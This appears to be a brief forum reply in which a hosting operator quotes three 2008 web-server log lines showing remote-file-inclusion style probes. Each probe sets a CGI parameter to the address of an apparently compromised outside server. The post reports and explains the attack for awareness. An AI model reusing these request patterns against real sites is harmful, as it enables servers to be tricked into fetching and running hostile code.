
Not Surprised
I've been seeing this from the hosting side for a few months now.
galadriel.netgroup.cz - - [03/Mar/2008:10:02:12 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
galadriel.netgroup.cz - - [03/Mar/2008:10:02:13 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
galadriel.netgroup.cz - - [03/Mar/2008:10:02:15 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
Randomly changing cgi fields with the full address of compromised servers.
trying to cache in on everyones machines.